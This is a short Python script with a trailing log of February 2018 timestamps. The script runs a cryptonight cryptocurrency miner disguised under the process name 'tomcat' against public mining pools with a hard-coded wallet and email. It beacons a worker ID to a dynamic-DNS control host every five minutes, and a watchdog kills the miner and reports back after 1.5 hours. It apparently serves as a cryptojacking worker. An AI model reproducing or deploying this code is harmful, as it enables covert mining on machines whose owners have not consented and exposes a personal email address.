import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:15:04.157381
#2018-02-17 17:03:05.410114
#2018-02-17 18:50:04.525460
#2018-02-17 20:39:06.869783
#2018-02-17 22:26:06.751634
#2018-02-18 00:09:06.384076
#2018-02-18 02:01:06.231852
#2018-02-18 03:49:06.003260
#2018-02-18 05:36:05.530973
#2018-02-18 07:29:04.214324
#2018-02-18 09:17:01.736769
#2018-02-18 11:02:06.811557
#2018-02-18 12:48:01.591076
#2018-02-18 14:34:07.987073
#2018-02-18 16:25:05.175526
#2018-02-18 18:14:06.604355
#2018-02-18 20:00:11.544120
#2018-02-18 21:47:04.517355
#2018-02-18 23:35:07.043139
#2018-02-19 01:21:07.196680
#2018-02-19 03:10:04.586785
#2018-02-19 04:55:07.929588
#2018-02-19 06:41:07.118780
#2018-02-19 08:32:06.502170
#2018-02-19 10:20:09.484858
#2018-02-19 12:08:08.411669
#2018-02-19 13:55:06.485521
#2018-02-19 15:43:07.600941
#2018-02-19 17:29:06.839064
#2018-02-19 19:17:05.147194
#2018-02-19 21:04:07.770733
#2018-02-19 22:52:07.053005
#2018-02-20 00:36:06.512779
#2018-02-20 02:25:01.412207
#2018-02-20 04:16:04.415207
#2018-02-20 05:59:06.144471
#2018-02-20 07:45:01.969560
#2018-02-20 09:31:06.122964
#2018-02-20 11:14:05.230826
#2018-02-20 13:02:01.870462
#2018-02-20 14:47:01.511487
#2018-02-20 16:34:01.676985
#2018-02-20 18:20:09.146542
#2018-02-20 20:11:07.683278
#2018-02-20 21:58:07.058828
#2018-02-20 23:38:05.539987
#2018-02-21 01:21:08.037808
#2018-02-21 03:09:05.613267
#2018-02-21 04:57:01.644519
#2018-02-21 06:43:05.524202
#2018-02-21 08:31:07.824428
#2018-02-21 10:17:08.103556
#2018-02-21 12:04:09.328644
#2018-02-21 13:53:09.102518
#2018-02-21 15:37:02.252674
#2018-02-21 17:27:08.930064
#2018-02-21 19:14:02.125635
#2018-02-21 21:02:05.495389
#2018-02-21 22:47:07.849413
#2018-02-22 00:33:07.145395
#2018-02-22 02:20:06.879638
#2018-02-22 04:08:07.151681
#2018-02-22 05:52:03.602206
#2018-02-22 07:38:07.732638
#2018-02-22 09:27:03.835099
#2018-02-22 11:13:04.697146
#2018-02-22 12:59:02.208728
#2018-02-22 14:46:08.016864
#2018-02-22 16:32:01.349816
#2018-02-22 18:17:07.170479
#2018-02-22 20:07:07.692476
#2018-02-22 21:54:07.167813
#2018-02-22 23:41:05.313114
#2018-02-23 01:28:01.960389
#2018-02-23 03:14:06.124053
#2018-02-23 05:02:02.169149
#2018-02-23 06:47:06.655993
#2018-02-23 08:41:01.769960
#2018-02-23 10:56:05.986621
#2018-02-23 12:52:01.998077
#2018-02-23 14:36:01.817106
#2018-02-23 16:25:12.960265
#2018-02-23 18:13:07.041598
#2018-02-23 19:58:06.211805
#2018-02-23 21:40:10.847332
#2018-02-23 23:29:05.609442
#2018-02-24 01:19:07.980678
#2018-02-24 03:09:07.597577
#2018-02-24 04:55:07.525421
#2018-02-24 06:40:06.497774
#2018-02-24 08:29:03.870482
#2018-02-24 10:16:04.862571
#2018-02-24 12:11:02.213048
#2018-02-24 13:57:03.890075
#2018-02-24 15:49:04.390799
#2018-02-24 17:46:07.302191
#2018-02-24 19:34:01.969780
#2018-02-24 21:21:05.327553
#2018-02-24 23:59:05.882876
#2018-02-25 03:16:05.619832
#2018-02-25 06:55:08.250633